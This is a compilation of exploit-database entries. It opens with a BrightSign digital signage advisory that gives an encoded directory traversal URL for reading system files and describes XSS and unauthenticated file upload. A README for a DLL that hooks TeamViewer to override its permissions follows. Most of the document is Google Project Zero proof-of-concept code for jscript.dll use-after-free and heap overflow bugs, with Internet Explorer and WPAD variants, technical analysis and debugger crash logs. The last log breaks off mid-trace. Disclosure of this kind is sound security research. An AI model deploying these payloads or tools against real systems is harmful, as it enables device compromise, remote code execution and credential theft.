# Exploit Author: singularitysec@gmail.com
# Vectors: XSS, Directory Traversal, File Modification, Information Leakage
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below)
suffers from multiple vulnerabilities.
The pages:
/network_diagnostics.html
/storage_info.html
suffer from a Cross-Site Scripting vulnerability. The REF parameter of these pages does not sanitize user input, resulting in arbitrary script execution, token theft and related attacks.
The RP parameter in STORAGE.HTML suffers from a directory
traversal/information leakage weakness:
/storage.html?rp=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc
Through parameter manipulation, the file system can be traversed,
unauthenticated, allowing for leakage of information and compromise of the
device.
This page also allows for unauthenticated upload of files.
/tools.html
Page allows for unauthenticated rename/manipulation of files.
When combined, these vulnerabilities allow for compromise of both end users
and the device itself.
Ex. A malicious attacker can upload a malicious page of their choosing and
steal credentials, host malicious content or distribute content through the
device, which accepts large format SD cards.
# TeamViewer Permissions Hook V1
---
[](https://github.com/gellin/TeamViewer_Permissions_Hook_V1/blob/master/LICENSE)
**A proof of concept injectable C++ DLL, that uses naked inline hooking and direct memory modification to change TeamViewer permissions.**
## Features
* **As the Server** - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switch sides" feature which is normally only active after you have already authenticated control with the client, and initiated a change of control/sides.
* **As the Client** - Allows for control of mouse with disregard to servers current control settings and permissions.
## Demo
#### As the Server

#### Client

## Rundown
* Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks a.k.a code caves, to hi-jack the pointers to use for modification via direct memory access to their reversed classes.
* Inject and follow the steps
## Requirements
* Your favorite Manual Mapper, PE Loader, DLL Injector, inject into - "TeamViewer.exe"
* This version was Built on Windows 10, for TeamViewer x86 Version 13.0.5058 - (Other versions of TeamViewer have not been tested but with more robust signatures it may work, linux not supported)
## Disclaimer
* Developed for educational purposes as a proof of concept for testing. I do not condone or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse.
## Credit
[@timse93](https://github.com/timse93) - Research and Testing
## EDB-Note
Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43366.zip
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1376
There is a use-after-free vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
- An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.
- The issue can also be exploited by opening a malicious web page in Internet Explorer.
The issue has been verified on 64-bit Win7 with the most recent patches applied.
PoC for Internet Explorer (might require page heap to trigger the crash):
============================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
// PoC for the NameTbl::GetValDef use-after-free described under "Technical
// details" below: an array of 100 plain objects is joined, and element 1's
// toString() is replaced by f(), which drops the object being stringified
// and forces a garbage collection while GetValDef still holds it.
var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};
function f() {
    // remove the only reference to the object whose toString() is running ...
    vars[1] = 1;
    // ... collect it, and return an object so GetValDef retries on the freed
    // NameTbl (per the analysis it calls toString/valueOf up to twice while
    // the result is still an object)
    CollectGarbage();
    return {};
}
vars[1].toString = f;
Array.prototype.join.call(vars);
</script>
<!--
============================================
PoC for WPAD (might require page heap to trigger the crash):
============================================
// WPAD variant of the IE PoC above: the same sequence placed in the PAC entry
// point that the WinHTTP Web Proxy Auto-Discovery Service evaluates with jscript.dll.
function FindProxyForURL(url, host) {
// 100 plain objects, reachable only through vars[]; join() stringifies each one.
var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};
// toString callback for vars[1]: dropping the last reference to the 'this'
// object and forcing a collection frees it while NameTbl::GetValDef still
// holds it; returning an object makes GetValDef retry on the freed object.
function f() {
vars[1] = 1;
CollectGarbage();
return {};
}
vars[1].toString = f;
Array.prototype.join.call(vars);
return "DIRECT";
}
===========================================
Technical details:
The issue is in NameTbl::GetValDef, which is called when an object is converted to a string. The function attempts to call toString() or valueOf() of the NameTbl object 2 times or until the return value isn't a JavaScript object. The issue is that the NameTbl object on which these methods are called isn't explicitly tracked by the garbage collector, which means the object can be deleted inside the toString/valueOf callback (as long as it's not tracked by the garbage collector somewhere else). Basically, toString/valueOf can delete its 'this' object.
Note that the crash location in the Debug log immediately precedes a virtual method call.
Debug log (from IE, but it looks similar in the WPAD service):
============================================
(a68.e4c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=????????????????
0:013> r
rax=0000000000000001 rbx=000007fef5d7bd50 rcx=00000000044acfa0
rdx=0000000000000000 rsi=0000000012b49fb8 rdi=0000000000000001
rip=000007fef5dea398 rsp=0000000012b49ae0 rbp=0000000000000000
r8=0000000004309f20 r9=0000000004309670 r10=0000000000000081
r11=0000000012b49a60 r12=0000000000000080 r13=0000000000000008
r14=00000000044d9f90 r15=0000000000000000
iopl=0 nv up ei ng nz ac po cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 00000000`12b49ae0 000007fe`f5dad069 jscript!NameTbl::GetValDef+0x58
01 00000000`12b49b70 000007fe`f5d7de69 jscript!NameTbl::InvokeInternal+0xb07
02 00000000`12b49c90 000007fe`f5d7bf3b jscript!VAR::GetValue+0xa1
03 00000000`12b49ce0 000007fe`f5ddb65d jscript!ConvertToString+0x5b
04 00000000`12b49f60 000007fe`f5d7c2ec jscript!JsArrayJoin+0x38d
05 00000000`12b4a060 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138
06 00000000`12b4a110 000007fe`f5d786ea jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`12b4a230 000007fe`f5dcdd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
08 00000000`12b4a280 000007fe`f5d7c2ec jscript!JsFncCall+0xc2
09 00000000`12b4a310 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138
0a 00000000`12b4a3c0 000007fe`f5d7b234 jscript!NameTbl::InvokeInternal+0x3f8
0b 00000000`12b4a4e0 000007fe`f5d79852 jscript!VAR::InvokeByName+0x81c
0c 00000000`12b4a6f0 000007fe`f5d79929 jscript!VAR::InvokeDispName+0x72
0d 00000000`12b4a770 000007fe`f5d724b8 jscript!VAR::InvokeByDispID+0x1229
0e 00000000`12b4a7c0 000007fe`f5d78ec2 jscript!CScriptRuntime::Run+0x5a6
0f 00000000`12b4b5c0 000007fe`f5d78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
10 00000000`12b4b7d0 000007fe`f5d78b95 jscript!ScrFncObj::Call+0xb7
11 00000000`12b4b870 000007fe`f5d7e6c0 jscript!CSession::Execute+0x19e
12 00000000`12b4b940 000007fe`f5d870e7 jscript!COleScript::ExecutePendingScripts+0x17a
13 00000000`12b4ba10 000007fe`f5d868d6 jscript!COleScript::ParseScriptTextCore+0x267
14 00000000`12b4bb00 000007fe`ead55251 jscript!COleScript::ParseScriptText+0x56
15 00000000`12b4bb60 000007fe`eb4db320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
16 00000000`12b4bbe0 000007fe`ead56256 MSHTML!CScriptCollection::ParseScriptText+0x37f
17 00000000`12b4bcc0 000007fe`ead55c8e MSHTML!CScriptData::CommitCode+0x3d9
18 00000000`12b4be90 000007fe`ead55a11 MSHTML!CScriptData::Execute+0x283
19 00000000`12b4bf50 000007fe`eb5146fb MSHTML!CHtmScriptParseCtx::Execute+0x101
1a 00000000`12b4bf90 000007fe`eadf8a5b MSHTML!CHtmParseBase::Execute+0x235
1b 00000000`12b4c030 000007fe`eacd2e39 MSHTML!CHtmPost::Broadcast+0x90
1c 00000000`12b4c070 000007fe`ead2caef MSHTML!CHtmPost::Exec+0x4bb
1d 00000000`12b4c280 000007fe`ead2ca40 MSHTML!CHtmPost::Run+0x3f
1e 00000000`12b4c2b0 000007fe`ead2da12 MSHTML!PostManExecute+0x70
1f 00000000`12b4c330 000007fe`ead30843 MSHTML!PostManResume+0xa1
20 00000000`12b4c370 000007fe`ead16fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
21 00000000`12b4c3c0 000007fe`eb544f78 MSHTML!CDwnChan::OnMethodCall+0x41
22 00000000`12b4c3f0 000007fe`eac39d75 MSHTML!GlobalWndOnMethodCall+0x240
23 00000000`12b4c490 00000000`77709bbd MSHTML!GlobalWndProc+0x150
24 00000000`12b4c510 00000000`777098c2 USER32!UserCallWinProcCheckWow+0x1ad
25 00000000`12b4c5d0 000007fe`f2be4a87 USER32!DispatchMessageWorker+0x3b5
26 00000000`12b4c650 000007fe`f2bebabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
27 00000000`12b4f8d0 000007fe`fe88572f IEFRAME!LCIETab_ThreadProc+0x3a3
28 00000000`12b4fa00 000007fe`f5ff925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
29 00000000`12b4fa30 00000000`775e59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
2a 00000000`12b4fa80 00000000`7781a561 kernel32!BaseThreadInitThunk+0xd
2b 00000000`12b4fab0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
0:013> !heap -p -a 00000000`044d9f90
address 00000000044d9f90 found in
_DPH_HEAP_ROOT @ 3fd1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
3fe0680: 44d9000 2000
000007fef5f78726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2
00000000778b4255 ntdll!RtlDebugFreeHeap+0x0000000000000035
000000007785797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982
000007feff2110c8 msvcrt!free+0x000000000000001c
000007fef5d7bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022
000007fef5d7b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240
000007fef5d942cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d
000007fef5d719e2 jscript!GcContext::Reclaim+0x00000000000000ae
000007fef5d81956 jscript!GcContext::CollectCore+0x000000000000018b
000007fef5d817a5 jscript!GcContext::Collect+0x0000000000000025
000007fef5dc42f3 jscript!JsCollectGarbage+0x0000000000000023
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7c199 jscript!NameTbl::InvokeInternal+0x0000000000000377
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5d724b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007fef5d78ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
000007fef5d78d2b jscript!ScrFncObj::Call+0x00000000000000b7
000007fef5da2084 jscript!NameTbl::InvokeInternal+0x000000000000060f
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5dea422 jscript!NameTbl::GetValDef+0x00000000000000e2
000007fef5dad069 jscript!NameTbl::InvokeInternal+0x0000000000000b07
000007fef5d7de69 jscript!VAR::GetValue+0x00000000000000a1
000007fef5d7bf3b jscript!ConvertToString+0x000000000000005b
000007fef5ddb65d jscript!JsArrayJoin+0x000000000000038d
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5dcdd72 jscript!JsFncCall+0x00000000000000c2
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007fef5d7b234 jscript!VAR::InvokeByName+0x000000000000081c
000007fef5d79852 jscript!VAR::InvokeDispName+0x0000000000000072
0:013> u rip
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14]
000007fe`f5dea39b 488b98e0000000 mov rbx,qword ptr [rax+0E0h]
000007fe`f5dea3a2 488bcb mov rcx,rbx
000007fe`f5dea3a5 ff15b5320400 call qword ptr [jscript!_guard_check_icall_fptr (000007fe`f5e2d660)]
000007fe`f5dea3ab 488b54fc40 mov rdx,qword ptr [rsp+rdi*8+40h]
000007fe`f5dea3b0 4c8d442450 lea r8,[rsp+50h]
000007fe`f5dea3b5 498bce mov rcx,r14
000007fe`f5dea3b8 ffd3 call rbx
============================================
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1383
There is a heap overflow vulnerability in the jscript.dll library (used in IE, WPAD and other places). The bug affects 2 functions, JsArrayStringHeapSort and JsArrayFunctionHeapSort.
PoC for IE (note: page heap might be required to observe the crash):
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
// vars is never referenced again in this script.
var vars = new Array(100);
// A 1000-slot array with only indices 1..599 filled (index 0 is set in go()),
// so the element count the sort sees is smaller than the array length.
var arr = new Array(1000);
for(var i=1;i<600;i++) arr[i] = i;
// The string sort calls toString on each element. This callback fills the
// remaining slots, growing the element count after the sort has already sized
// its intermediate buffers from the original count (see the technical details).
var o = {toString:function() {
for(var i=600;i<1000;i++) {
arr[i] = 1337;
}
}}
// Put the callback object at index 0 and start the sort. No comparison function
// is passed, so the string-comparison path (JsArrayStringHeapSort in the stack
// trace below) is taken.
function go() {
arr[0] = o;
Array.prototype.sort.call(arr);
}
// Run the trigger.
go();
</script>
<!--
=========================================
Technical details:
Array.sort is implemented in JsArraySort which, depending on whether a comparison function was specified, calls JsArrayStringHeapSort or JsArrayFunctionHeapSort. These (vulnerable) functions take several arguments, 2 of which are the input array length and the number of elements currently in the input array (this can be smaller than the array length). The vulnerable functions are going to allocate 2 buffers to store intermediate data. The size of these buffers will be calculated based on *num_elements*. However, while filling those arrays it is possible that the number of elements is going to increase, which causes a heap overflow.
Debug log:
=========================================
0:023> g
(e5c.988): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!NameTbl::GetValCore+0x30:
000007fe`f4f59df0 498900 mov qword ptr [r8],rax ds:00000000`04603010=????????????????
0:013> r
rax=c0c0c0c0c0c00003 rbx=000000000443cf20 rcx=000000000441df90
rdx=0000000000000003 rsi=0000000004603010 rdi=000000000441df90
rip=000007fef4f59df0 rsp=00000000129a8e10 rbp=0000000000000000
r8=0000000004603010 r9=000000000441fdc8 r10=00000000040a9800
r11=00000000129a8e70 r12=0000000003ecb690 r13=0000000000000001
r14=0000000004603010 r15=0000000000000259
iopl=0 nv up ei ng nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283
jscript!NameTbl::GetValCore+0x30:
000007fe`f4f59df0 498900 mov qword ptr [r8],rax ds:00000000`04603010=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 00000000`129a8e10 000007fe`f4f75f0e jscript!NameTbl::GetValCore+0x30
01 00000000`129a8e70 000007fe`f4f761d8 jscript!ArrayObj::GetValAtIndex+0x62
02 00000000`129a8eb0 000007fe`f4fbd5a2 jscript!ArrayObj::GetVal+0x28
03 00000000`129a8f40 000007fe`f4fbcd90 jscript!JsArrayStringHeapSort+0x1a6
04 00000000`129a90d0 000007fe`f4f5c2ec jscript!JsArraySort+0x270
05 00000000`129a9180 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138
06 00000000`129a9230 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`129a9350 000007fe`f4fadd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
08 00000000`129a93a0 000007fe`f4f5c2ec jscript!JsFncCall+0xc2
09 00000000`129a9430 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138
0a 00000000`129a94e0 000007fe`f4f5b234 jscript!NameTbl::InvokeInternal+0x3f8
0b 00000000`129a9600 000007fe`f4f59852 jscript!VAR::InvokeByName+0x81c
0c 00000000`129a9810 000007fe`f4f59929 jscript!VAR::InvokeDispName+0x72
0d 00000000`129a9890 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0x1229
0e 00000000`129a98e0 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6
0f 00000000`129aa6e0 000007fe`f4f594b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
10 00000000`129aa8f0 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x2d3
11 00000000`129aaa10 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
12 00000000`129aaa60 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6
13 00000000`129ab860 000007fe`f4f58d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
14 00000000`129aba70 000007fe`f4f58b95 jscript!ScrFncObj::Call+0xb7
15 00000000`129abb10 000007fe`f4f5e6c0 jscript!CSession::Execute+0x19e
16 00000000`129abbe0 000007fe`f4f670e7 jscript!COleScript::ExecutePendingScripts+0x17a
17 00000000`129abcb0 000007fe`f4f668d6 jscript!COleScript::ParseScriptTextCore+0x267
18 00000000`129abda0 000007fe`ec595251 jscript!COleScript::ParseScriptText+0x56
19 00000000`129abe00 000007fe`ecd1b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
1a 00000000`129abe80 000007fe`ec596256 MSHTML!CScriptCollection::ParseScriptText+0x37f
1b 00000000`129abf60 000007fe`ec595c8e MSHTML!CScriptData::CommitCode+0x3d9
1c 00000000`129ac130 000007fe`ec595a11 MSHTML!CScriptData::Execute+0x283
1d 00000000`129ac1f0 000007fe`ecd546fb MSHTML!CHtmScriptParseCtx::Execute+0x101
1e 00000000`129ac230 000007fe`ec638a5b MSHTML!CHtmParseBase::Execute+0x235
1f 00000000`129ac2d0 000007fe`ec512e39 MSHTML!CHtmPost::Broadcast+0x90
20 00000000`129ac310 000007fe`ec56caef MSHTML!CHtmPost::Exec+0x4bb
21 00000000`129ac520 000007fe`ec56ca40 MSHTML!CHtmPost::Run+0x3f
22 00000000`129ac550 000007fe`ec56da12 MSHTML!PostManExecute+0x70
23 00000000`129ac5d0 000007fe`ec570843 MSHTML!PostManResume+0xa1
24 00000000`129ac610 000007fe`ec556fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
25 00000000`129ac660 000007fe`ecd84f78 MSHTML!CDwnChan::OnMethodCall+0x41
26 00000000`129ac690 000007fe`ec479d75 MSHTML!GlobalWndOnMethodCall+0x240
27 00000000`129ac730 00000000`76d19bbd MSHTML!GlobalWndProc+0x150
28 00000000`129ac7b0 00000000`76d198c2 USER32!UserCallWinProcCheckWow+0x1ad
29 00000000`129ac870 000007fe`f11a4a87 USER32!DispatchMessageWorker+0x3b5
2a 00000000`129ac8f0 000007fe`f11ababb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
2b 00000000`129afb70 000007fe`fd48572f IEFRAME!LCIETab_ThreadProc+0x3a3
2c 00000000`129afca0 000007fe`f521925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
2d 00000000`129afcd0 00000000`76e159cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
2e 00000000`129afd20 00000000`76f4a561 kernel32!BaseThreadInitThunk+0xd
2f 00000000`129afd50 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
=========================================
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1369
There is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors:
- An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.
- The issue can also be exploited by opening a malicious web page in Internet Explorer. In this case, due to the sizes involved, a 64-bit tab process would most likely be required to trigger the issue. This is going to be the case for example when running IE in the Enhanced Protected Mode.
The issue has been verified on 64-bit Win7 and 64-bit Win10 with the most recent patches applied.
PoC for Internet Explorer:
============================================
-->
<!-- saved from url=(0014)about:internet -->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
</head>
<body>
<script language="Jscript.Encode">
// Build a 2^28-character string by repeated doubling.
var s = 'a';
for(var i=0;i<28;i++) {
s = s+s;
}
// The pattern is now roughly 2^29 characters. Presumably the byte size of this
// UTF-16 text is what pushes the signed 32-bit size arithmetic in the caller of
// RegExpBase::EnsureSpace past INT_MAX (see the technical details); confirm against
// the report.
s = s+'[a-z]'+s;
r = new RegExp();
// Compiling the pattern reaches RegExpComp::Compile, which appends the raw input
// string to an undersized buffer once the size has wrapped negative.
r.compile(s);
</script>
</body>
</html>
<!--
============================================
PoC for WPAD:
============================================
// WPAD variant of the IE PoC above, placed in the PAC entry point that the
// WinHTTP Web Proxy Auto-Discovery Service evaluates with jscript.dll.
function FindProxyForURL(url, host) {
// 2^28 characters by repeated doubling, then roughly 2^29 with the class in the middle.
var s = 'a';
for(var i=0;i<28;i++) {
s = s+s;
}
s = s+'[a-z]'+s;
r = new RegExp();
// Size arithmetic in the caller of RegExpBase::EnsureSpace wraps negative, so
// the buffer is not grown before the raw input string is appended.
r.compile(s);
return "DIRECT";
}
===========================================
Technical details:
The issue is in RegExpComp::Compile (and several functions called from RegExpComp::Compile). RegExpComp::Compile is responsible for compiling a RegExp object. It maintains a buffer with the compilation result and extends it when necessary. Extending the buffer is handled using RegExpBase::EnsureSpace which looks (approximately) like:
// Approximate reconstruction from the report, not recovered source.
// desired_size is a signed 32-bit integer computed by the caller as
// (current content size + bytes to append).
void RegExpBase::EnsureSpace(int desired_size) {
// A negative desired_size (the caller's addition having overflowed) fails this
// test, so the function returns without growing the buffer and the caller
// then writes into the old, too-small allocation.
if(desired_size > buffer_size) {
// Only the doubling below is overflow-checked, not the caller's addition.
if(2 * desired_size < desired_size) {
//throw an exception
}
int new_size = 2 * desired_size;
char * new_buffer = realloc(buffer, new_size);
if(!new_buffer) {
//throw an exception
}
buffer = new_buffer;
buffer_size = new_size;
}
}
Note that desired_size is a signed 32-bit integer. RegExpBase::EnsureSpace has an integer overflow check, however if an overflow happens in the caller (a caller must add the size which it wants to append to the existing content size) and desired_size becomes negative, RegExpBase::EnsureSpace would simply return because of the first if() statement without attempting to extend the buffer.
Indeed, integer overflows can happen in several callers of RegExpBase::EnsureSpace. The one triggered in the PoC is in RegExpComp::Compile, when it attempts to append the raw input string to the buffer towards the end of the compilation process.
Debug log (from IE, but it looks similar in the WPAD service):
============================================
(b90.698): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
msvcrt!memcpy+0x1d9:
000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????
0:012> r
rax=0000000040000061 rbx=00000000042b7ea0 rcx=000000025bb60fe0
rdx=fffffffdfa4b0010 rsi=00000000042b5f48 rdi=000000004000000a
rip=000007fefefe123d rsp=0000000012399ef8 rbp=0000000012399f28
r8=0000000040000008 r9=0000000000000000 r10=6100610061006100
r11=000000021bb60fd8 r12=0000000016010fe8 r13=000007feebc91670
r14=0000000020000001 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
msvcrt!memcpy+0x1d9:
000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????
0:012> k
# Child-SP RetAddr Call Site
00 00000000`12399ef8 000007fe`ebc88bb3 msvcrt!memcpy+0x1d9
01 00000000`12399f00 000007fe`ebcfacc2 jscript!RegExpComp::Compile+0x1b7
02 00000000`12399f60 000007fe`ebce2118 jscript!RegExpComp::CompileDynamic+0x62
03 00000000`12399fa0 000007fe`ebce3310 jscript!RegExpObj::Compile+0x32c
04 00000000`1239a0f0 000007fe`ebc7c2ec jscript!JsRegExpCompile+0x70
05 00000000`1239a140 000007fe`ebc7a9fe jscript!NatFncObj::Call+0x138
06 00000000`1239a1f0 000007fe`ebc7b234 jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`1239a310 000007fe`ebc79852 jscript!VAR::InvokeByName+0x81c
08 00000000`1239a520 000007fe`ebc79929 jscript!VAR::InvokeDispName+0x72
09 00000000`1239a5a0 000007fe`ebc724b8 jscript!VAR::InvokeByDispID+0x1229
0a 00000000`1239a5f0 000007fe`ebc78ec2 jscript!CScriptRuntime::Run+0x5a6
0b 00000000`1239b3f0 000007fe`ebc78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
0c 00000000`1239b600 000007fe`ebc78b95 jscript!ScrFncObj::Call+0xb7
0d 00000000`1239b6a0 000007fe`ebc7e6c0 jscript!CSession::Execute+0x19e
0e 00000000`1239b770 000007fe`ebc870e7 jscript!COleScript::ExecutePendingScripts+0x17a
0f 00000000`1239b840 000007fe`ebc868d6 jscript!COleScript::ParseScriptTextCore+0x267
10 00000000`1239b930 000007fe`ecdf5251 jscript!COleScript::ParseScriptText+0x56
11 00000000`1239b990 000007fe`ed57b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
12 00000000`1239ba10 000007fe`ecdf6256 MSHTML!CScriptCollection::ParseScriptText+0x37f
13 00000000`1239baf0 000007fe`ecdf5c8e MSHTML!CScriptData::CommitCode+0x3d9
14 00000000`1239bcc0 000007fe`ecdf5a11 MSHTML!CScriptData::Execute+0x283
15 00000000`1239bd80 000007fe`ed5b46fb MSHTML!CHtmScriptParseCtx::Execute+0x101
16 00000000`1239bdc0 000007fe`ece98a5b MSHTML!CHtmParseBase::Execute+0x235
17 00000000`1239be60 000007fe`ecd72e39 MSHTML!CHtmPost::Broadcast+0x90
18 00000000`1239bea0 000007fe`ecdccaef MSHTML!CHtmPost::Exec+0x4bb
19 00000000`1239c0b0 000007fe`ecdcca40 MSHTML!CHtmPost::Run+0x3f
1a 00000000`1239c0e0 000007fe`ecdcda12 MSHTML!PostManExecute+0x70
1b 00000000`1239c160 000007fe`ecdd0843 MSHTML!PostManResume+0xa1
1c 00000000`1239c1a0 000007fe`ecdb6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1d 00000000`1239c1f0 000007fe`ed5e4f78 MSHTML!CDwnChan::OnMethodCall+0x41
1e 00000000`1239c220 000007fe`eccd9d75 MSHTML!GlobalWndOnMethodCall+0x240
1f 00000000`1239c2c0 00000000`77229bbd MSHTML!GlobalWndProc+0x150
20 00000000`1239c340 00000000`772298c2 USER32!UserCallWinProcCheckWow+0x1ad
21 00000000`1239c400 000007fe`f29d4a87 USER32!DispatchMessageWorker+0x3b5
22 00000000`1239c480 000007fe`f29dbabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
23 00000000`1239f700 000007fe`fd73572f IEFRAME!LCIETab_ThreadProc+0x3a3
24 00000000`1239f830 000007fe`ee62925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
25 00000000`1239f860 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
26 00000000`1239f8b0 00000000`7745a561 kernel32!BaseThreadInitThunk+0xd
27 00000000`1239f8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
============================================
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1381
There is a use-after-free in jscript.dll library that can be exploited in IE11.
PoC:
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
// toJSON of the root object returns a fresh array holding o2. Per the technical
// details, the value returned by this callback is not placed on the garbage
// collector's root list, so nothing keeps the array alive during later callbacks.
var o1 = {toJSON:function(){
alert('o1');
return [o2];
}}
// Invoked while that array is being serialized: the forced collection frees the
// array, and JSONStringifyArray continues on the freed memory (see the crash and
// the !heap output below).
var o2 = {toJSON:function(){
alert('o2');
CollectGarbage();
return 'x';
}}
JSON.stringify(o1);
</script>
<!--
=========================================
Technical details:
JSONStringifyObject first calls JSONApplyFilters which calls an argument's toString method. However the return value of the toString method won't be on the garbage collector's root object list and thus can be freed during subsequent callbacks.
Debug log:
=========================================
0:028> g
(df8.e48): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!JSONStringifyArray+0x38f:
000007fe`edbf9fb3 66214738 and word ptr [rdi+38h],ax ds:00000000`04518fc8=????
0:014> r
rax=000000000000fffb rbx=0000000000000000 rcx=0000000000000005
rdx=0000000000000005 rsi=00000000129ca100 rdi=0000000004518f90
rip=000007feedbf9fb3 rsp=00000000129c9f30 rbp=00000000129c9fa9
r8=0000000000000000 r9=000000000405d670 r10=0000000000000081
r11=00000000129c9f00 r12=0000000000000001 r13=0000000000000001
r14=0000000000000000 r15=00000000129ca1a8
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
jscript!JSONStringifyArray+0x38f:
000007fe`edbf9fb3 66214738 and word ptr [rdi+38h],ax ds:00000000`04518fc8=????
0:014> k
# Child-SP RetAddr Call Site
00 00000000`129c9f30 000007fe`edbfa2cc jscript!JSONStringifyArray+0x38f
01 00000000`129ca000 000007fe`edbfec94 jscript!JSONStringifyObject+0x2dc
